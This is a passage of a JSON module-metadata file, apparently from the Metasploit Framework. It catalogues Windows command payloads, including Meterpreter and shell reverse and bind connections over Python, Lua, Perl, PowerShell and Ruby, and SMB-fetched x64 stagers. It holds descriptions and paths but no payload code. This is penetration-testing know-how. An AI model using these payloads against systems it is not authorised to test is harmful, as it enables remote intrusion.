"author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/windows/python/meterpreter_reverse_https": { + "name": "Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline", + "fullname": 
"payload/cmd/windows/python/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/windows/python/meterpreter_reverse_tcp": { + "name": "Python Exec, Python Meterpreter Shell, Reverse TCP Inline", + "fullname": "payload/cmd/windows/python/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter_reverse_tcp", + "staged": false + 
}, + "payload_cmd/windows/python/pingback_bind_tcp": { + "name": "Python Exec, Python Pingback, Bind TCP (via python)", + "fullname": "payload/cmd/windows/python/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "asoto-r7" + ], + "description": "Execute a Python payload from a command.\n\nListens for a connection from the attacker, sends a UUID, then terminates", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/pingback_bind_tcp", + "staged": false + }, + "payload_cmd/windows/python/pingback_reverse_tcp": { + "name": "Python Exec, Python Pingback, Reverse TCP (via python)", + "fullname": "payload/cmd/windows/python/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "asoto-r7" + ], + "description": "Execute a Python payload from a command.\n\nConnects back to the attacker, sends a UUID, then terminates", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": 
false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/python/shell_bind_tcp": { + "name": "Python Exec, Command Shell, Bind TCP (via python)", + "fullname": "payload/cmd/windows/python/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "mumbai" + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/shell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/python/shell_reverse_sctp": { + "name": "Python Exec, Command Shell, Reverse SCTP (via python)", + "fullname": "payload/cmd/windows/python/shell_reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "RageLtMan " + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.6-2.7 and 3.4+.", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/shell_reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/shell_reverse_sctp", + "staged": false + }, + "payload_cmd/windows/python/shell_reverse_tcp": { + "name": "Python Exec, Command Shell, Reverse TCP (via python)", + "fullname": "payload/cmd/windows/python/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Campbell " + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.4-2.7 and 3.4+.", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/python/shell_reverse_tcp_ssl": { + "name": "Python Exec, Command Shell, Reverse TCP SSL (via python)", + "fullname": "payload/cmd/windows/python/shell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "RageLtMan " + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, uses SSL, encodes with base64 by design. 
Compatible with Python 2.6-2.7 and 3.4+.", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/shell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/shell_reverse_tcp_ssl", + "staged": false + }, + "payload_cmd/windows/python/shell_reverse_udp": { + "name": "Python Exec, Command Shell, Reverse UDP (via python)", + "fullname": "payload/cmd/windows/python/shell_reverse_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "RageLtMan " + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.6-2.7 and 3.4+.", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/shell_reverse_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/shell_reverse_udp", + "staged": false + }, + "payload_cmd/windows/reverse_lua": { + "name": "Windows Command Shell, Reverse TCP (via Lua)", + "fullname": "payload/cmd/windows/reverse_lua", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "xistence " + ], + "description": "Creates an interactive shell via Lua", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/reverse_lua.rb", + "is_install_path": true, + "ref_name": "cmd/windows/reverse_lua", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/reverse_perl": { + "name": "Windows Command, Double Reverse TCP Connection (via Perl)", + "fullname": "payload/cmd/windows/reverse_perl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "cazz ", + "aushack " + ], + "description": "Creates an interactive shell via perl", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + 
"mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/reverse_perl.rb", + "is_install_path": true, + "ref_name": "cmd/windows/reverse_perl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/reverse_powershell": { + "name": "Windows Command Shell, Reverse TCP (via Powershell)", + "fullname": "payload/cmd/windows/reverse_powershell", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Dave Kennedy", + "Ben Campbell " + ], + "description": "Connect back and create a command shell via Powershell", + "references": [ + "URL-https://github.com/trustedsec/social-engineer-toolkit/blob/master/src/powershell/reverse.powershell" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/reverse_powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/reverse_powershell", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/reverse_ruby": { + "name": "Windows Command Shell, Reverse TCP (via Ruby)", + "fullname": "payload/cmd/windows/reverse_ruby", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn " + ], + "description": "Connect back and create a command shell via Ruby", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/reverse_ruby.rb", + 
"is_install_path": true, + "ref_name": "cmd/windows/reverse_ruby", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/smb/x64/custom/bind_ipv6_tcp": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/custom/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID 
Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/custom/bind_named_pipe": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/smb/x64/custom/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_named_pipe" + }, + 
"payload_cmd/windows/smb/x64/custom/bind_tcp": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/custom/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/smb/x64/custom/bind_tcp_rc4": { + "name": "SMB Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/custom/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + 
"is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/smb/x64/custom/bind_tcp_uuid": { + "name": "SMB Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/smb/x64/custom/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/custom/reverse_http": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/smb/x64/custom/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", 
+ "author": [ + "Spencer McIntyre", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/reverse_http", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/smb/x64/custom/reverse_https": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/smb/x64/custom/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + 
"adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/reverse_https", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/smb/x64/custom/reverse_named_pipe": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/smb/x64/custom/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/smb/x64/custom/reverse_tcp": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/custom/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": 
"Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/smb/x64/custom/reverse_tcp_rc4": { + "name": "SMB Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/custom/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + 
"payload_cmd/windows/smb/x64/custom/reverse_tcp_uuid": { + "name": "SMB Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/smb/x64/custom/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/custom/reverse_winhttp": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/smb/x64/custom/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 
+0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/smb/x64/custom/reverse_winhttps": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/smb/x64/custom/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/smb/x64/encrypted_shell/reverse_tcp": { + "name": "SMB Fetch, Windows Command Shell, Encrypted Reverse TCP Stager", + "fullname": 
"payload/cmd/windows/smb/x64/encrypted_shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Matt Graeber", + "Shelby Pace" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/encrypted_shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", + "staged": true, + "stage_refname": 